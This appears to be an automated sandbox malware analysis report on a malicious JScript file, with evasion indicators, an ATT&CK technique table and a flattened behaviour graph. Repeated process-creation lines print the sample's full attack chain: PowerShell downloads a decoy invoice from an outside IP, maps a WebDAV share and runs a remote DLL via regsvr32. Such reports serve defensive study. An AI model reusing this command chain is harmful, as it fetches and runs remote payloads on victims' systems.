    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

    Data Obfuscation

    barindex
    Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.RegRead("HKEY_CURRENT_USER\Control Panel\International\Locale");IHost.CreateObject("WScript.Shell");IWshShell3.RegRead("HKEY_CURRENT_USER\Control Panel\International\Locale");IHost.CreateObject("WScript.Shell");IWshShell3.Run("cmd /c powershell.exe -Command "Invoke-WebRequest -OutFile %temp%\invoice.", "0", "false")
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"Jump to behavior

    Hooking and other Techniques for Hiding and Protection

    barindex
    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 8888
    Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49705
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Windows\System32\wscript.exeCOM call: HKEY_CURRENT_USER\Control Panel\International\LocaleJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4729Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4968Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6412Thread sleep count: 4729 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5788Thread sleep count: 4968 > 30Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2020Thread sleep time: -13835058055282155s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5512Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5972Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4708Thread sleep time: -922337203685477s >= -30000sJump to behavior
    Source: C:\Windows\System32\net.exe TID: 6584Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\System32\svchost.exe TID: 7408Thread sleep time: -30000s >= -30000sJump to behavior
    Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
    Source: net.exe, 00000007.00000002.2124383639.000001C0D4538000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000003.2123251610.000001C0D4599000.00000004.00000020.00020000.00000000.sdmp, net.exe, 00000007.00000002.2124471907.000001C0D4599000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.3359612355.0000018F9085B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
    Source: svchost.exe, 00000009.00000002.3358642094.0000018F8B22B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW@
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\AppData\Local\Temp\invoice.pdf"Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.205@8888\davwwwroot\Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.205@8888\davwwwroot\Jump to behavior
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell.exe -command "invoke-webrequest -outfile c:\users\user\appdata\local\temp\invoice.pdf http://193.143.1.205/invoice.php"&&start c:\users\user\appdata\local\temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "c:\windows\system32\cmd.exe" /c powershell.exe -command "invoke-webrequest -outfile c:\users\user\appdata\local\temp\invoice.pdf http://193.143.1.205/invoice.php"&&start c:\users\user\appdata\local\temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dllJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\svchost.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

    Stealing of Sensitive Information

    barindex
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dll
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.205@8888\davwwwroot\
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.205@8888\davwwwroot\
    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c powershell.exe -Command "Invoke-WebRequest -OutFile C:\Users\user\AppData\Local\Temp\invoice.pdf http://193.143.1.205/invoice.php"&&start C:\Users\user\AppData\Local\Temp\invoice.pdf&&cmd /c net use \\193.143.1.205@8888\davwwwroot\&&cmd /c regsvr32 /s \\193.143.1.205@8888\davwwwroot\13188269477300.dllJump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c net use \\193.143.1.205@8888\davwwwroot\Jump to behavior
    Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net use \\193.143.1.205@8888\davwwwroot\Jump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information22
    Scripting
    Valid Accounts1
    Command and Scripting Interpreter
    22
    Scripting
    11
    Process Injection
    11
    Masquerading
    OS Credential Dumping1
    Network Share Discovery
    Remote ServicesData from Local System1
    Data Obfuscation
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts1
    Native API
    1
    DLL Side-Loading
    1
    DLL Side-Loading
    131
    Virtualization/Sandbox Evasion
    LSASS Memory11
    Security Software Discovery
    Remote Desktop ProtocolData from Removable Media11
    Non-Standard Port
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts1
    Exploitation for Client Execution
    Logon Script (Windows)Logon Script (Windows)11
    Process Injection
    Security Account Manager1
    Process Discovery
    SMB/Windows Admin SharesData from Network Shared Drive1
    Ingress Tool Transfer
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal Accounts2
    PowerShell
    Login HookLogin Hook1
    Obfuscated Files or Information
    NTDS131
    Virtualization/Sandbox Evasion
    Distributed Component Object ModelInput Capture2
    Non-Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
    DLL Side-Loading
    LSA Secrets1
    Application Window Discovery
    SSHKeylogging12
    Application Layer Protocol
    Scheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials1
    File and Directory Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync122
    System Information Discovery
    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1591624 Sample: 1475127682155276.js Startdate: 15/01/2025 Architecture: WINDOWS Score: 100 38 x1.i.lencr.org 2->38 50 Suricata IDS alerts for network traffic 2->50 52 Multi AV Scanner detection for submitted file 2->52 54 Sigma detected: Powershell launch regsvr32 2->54 56 6 other signatures 2->56 10 wscript.exe 1 1 2->10         started        13 svchost.exe 1 1 2->13         started        signatures3 process4 dnsIp5 60 JScript performs obfuscated calls to suspicious functions 10->60 62 Wscript starts Powershell (via cmd or directly) 10->62 64 Windows Scripting host queries suspicious COM object (likely to drop second stage) 10->64 66 3 other signatures 10->66 16 cmd.exe 3 2 10->16         started        42 127.0.0.1 unknown unknown 13->42 signatures6 process7 signatures8 44 Suspicious powershell command line found 16->44 46 Wscript starts Powershell (via cmd or directly) 16->46 48 Gathers information about network shares 16->48 19 powershell.exe 14 16 16->19         started        23 cmd.exe 1 16->23         started        26 Acrobat.exe 65 16->26         started        28 conhost.exe 16->28         started        process9 